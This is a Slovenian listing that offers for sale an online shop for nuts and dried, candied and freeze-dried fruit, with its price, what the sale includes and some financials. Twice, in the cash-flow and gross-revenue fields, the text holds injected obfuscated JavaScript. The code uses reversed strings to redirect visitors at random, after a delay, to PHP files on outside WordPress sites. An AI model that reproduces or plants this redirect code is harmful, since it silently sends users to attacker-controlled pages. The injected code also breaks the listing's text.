Prodaja spletne trgovine z oreščki, suhim, kandiranim in liofiliziranim sadjem...

 Spletna trgovina / Novo

5.000,00€

Prodamo delujočo in aktivno spletno trgovino z oreščki, suhim, kandiranim in liofiliziranim sadjem na OpenMage (o.p. Magento).
Spletna trgovina je zaživela v sredini leta 2021. Postavljena je na platformi, ki omogoča praktično neomejene razširitve, ne glede na to kako hitra je rast posla. Je tehnično in sistemsko dovršena z dodanimi moduli, za čim bolj smiselno avtomatizacijo.

Zaradi novih poslovnih izzivov prodajamo spletno trgovino z vsemi pravicami in blagovno znamko. Ker gre z delujoč posel, se vrednost zaloge spreminja. Zato je odkup zalog po dogovoru.

Posredujemo tudi:
– dostop do socialnih omrežij,
– kontakte dobaviteljev,
– pravice do uporabe lastniških fotografij
– know-how,
– e-mail bazo,

Kupcu nudimo tudi pomoč na začetku vodenja dejavnosti in vse potrebne informacije glede nadaljnjega urejanja spletne trgovine.

  • Listing ID: 2118
  • Vključuje: Blagovna znamka, Know-how, Dogovori s kupci, Dogovori z dobavitelji, Spletna stran
  • Vključno s podjetjem: NE - samo dejavnost
  • Brez bremen, dolgov in obveznosti: DA
  • Ustanovljeno: 2021
  • Denarni <script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>tok: 25000
  • Bru<script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to prihodki: 10000
  • EBITDA: 1
  • Zaloge (MPC): 7000
Contact details

Osrednjeslovenska,4000 Show Phone Number ***** https://www.sis-nuts.si/

Contact this listing owner